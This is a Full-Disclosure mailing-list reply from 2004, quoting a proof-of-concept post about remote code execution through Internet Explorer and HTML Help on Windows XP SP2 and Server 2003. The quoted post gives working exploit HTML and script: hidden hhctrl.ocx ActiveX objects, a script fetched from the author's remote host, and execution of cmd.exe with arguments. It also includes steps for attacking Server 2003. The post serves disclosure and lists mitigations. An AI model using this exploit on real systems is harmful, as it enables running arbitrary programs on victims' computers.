Re: Windows (XP SP2) Remote code execution withparameters

["morning_wood" <se_cur_ity () hotmail com>]

 On my SP1 system I get a dialog asking if i want to install "hhctrl.ocx"
other than that, nothing happens, no fles dropped, nothing unusual. ( of
course i closed the dialog
for hhctrl.ocx installer ). The file "ntshared.chm" does exist in
C:\windows\help.
I have no "unusual" security settings or 3rd party software blocking
scripts/activex.

hmm?

m.w

----- Original Message ----- 
From: "ShredderSub7 SecExpert" <shreddersub7 () hotmail com>
To: <full-disclosure () lists netsys com>
Sent: Monday, December 27, 2004 4:24 PM
Subject: [Full-disclosure] Windows (XP SP2) Remote code execution
withparameters


> PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
> Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm
>
> ------------------Which systems are vulnerable?--------
> Any system running any Microsoft Windows XP edition with Internet Explorer
6
> or higher, even with SP2 applied.
> Any system running any Microsoft Windows Server 2003 edition with Internet
> Explorer 6 or higher.
>
> ------------------How does this exploit work?-----------
> The problem with Internet Explorer is that it doesn't set any restrictions
> on web pages that request opening a Windows Help file, compiled with HTML
> Help. Without a restriction, we can (in Internet Explorer) easily command
to
> open any local web page stored on a victim's computer, including web pages
> that are founded in Windows Help files (with extension .CHM). In this PoC
> (Proof of Concept, see below for viewing the PoC), the web page
> "alt_url_enterprise_specific.htm" (that is founded in the Windows Help
file
> "ntshared.chm") will be opened in the HTML Help program "hh.exe".
> Since we now opened a web page stored in a Windows Help file (.CHM), it is
> possible (thanks to the exploit) to execute a HTML Help control (in this
> case, an ActiveX control) that only fully works in Help files. So in this
> PoC, we choosed to launch an ActiveX control for HTML Help. Then, this
> ActiveX control will execute any program we want, in this example that's
> "cmd.exe".
>
> Thanks to the exploit, it is even possible to add parameters to the
executed
> program (here: cmd.exe), so that you can easily start malware out of
> "cmd.exe". In this PoC, we added the parameter "/c pause" to the execution
> code "cmd.exe", and the result is a DOS Prompt with the text "Press any
key
> to continue. . .".
>
> To make it complete, the 2 needed programs (Internet Explorer and HTML
Help)
> will be automatically shutted down after the execution is finished. In
this
> PoC, HTML Help and Internet Explorer will be automatically closed after
the
> execution, without user interaction.
>
> ------------------How can you reproduce this PoC?------------------
> Create the file "htm.htm" with the following code (please notice that you
> may want to modify the full path to the file "htm.txt"):
> --------------
> &lt;html&gt;<head><title>CMDExe - Windows Exploit - Remote code execution
> with parameters - Proof of Concept</title></head><body>
> <br>&lt;OBJECT style="display:none" id="locate"
> type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194"&gt;
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_spec
ific.htm">
> </OBJECT>
> <OBJECT style="display:none" id="locator" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value='command;javascript:execScript("document.write(\"<script
> language=\\\"javascript\\\"
src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCo
de(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
> </OBJECT>
&lt;script&gt;locate.HHClick();setTimeout("locator.HHClick()",100);setTimeou
t("window.opener=null;window.close()",10000)&lt;/script&gt;</body>&lt;/html&
gt;
> --------------
>
> Then create the file "htm.txt" (please notice that you may have to change
> the full path to your specified program, in this case "cmd.exe"):
> --------------
> document.write("<object id=a
> classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command
> value=shortcut><param name=item1 value=',cmd.exe,/c
pause,'></object><object
> id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command
> value=close></object><script>a.Click\(\);b.Click\(\)</script>");
> --------------
>
> If you want to attack Windows Server 2003 systems, you also need to upload
> the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)
>
> --------------How to avoid this exploit...-------------
> Since there are no patches from Microsoft available yet, here are some
> (temporary?) solutions:  Disable Internet Explorer
> or disable Active Scripting (HOW?).
> OR Use another browser,for example Mozilla FireFox.
>
> More info (like credits, things that are included etc.) about this exploit
> can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm
>
> Contact: ShredderSub7_at_hotmail.com
>
> _________________________________________________________________
> Onze vernieuwde gezondheidsrubriek al gezien? http://www.msn.be/gezondheid
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html